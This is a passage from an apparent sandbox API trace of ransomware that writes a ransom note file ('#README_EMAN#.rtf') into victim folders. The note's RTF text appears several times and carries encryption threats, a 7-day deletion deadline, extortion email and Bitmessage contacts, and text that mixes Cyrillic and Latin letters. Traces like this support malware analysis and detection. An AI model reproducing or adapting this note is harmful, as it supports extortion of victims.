lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.363] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.364] CloseHandle (hObject=0x294) returned 1 [0273.364] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\#readme_eman#.rtf")) returned 0xffffffff [0273.364] GetLastError () returned 0x2 [0273.364] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ro\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.365] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.365] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 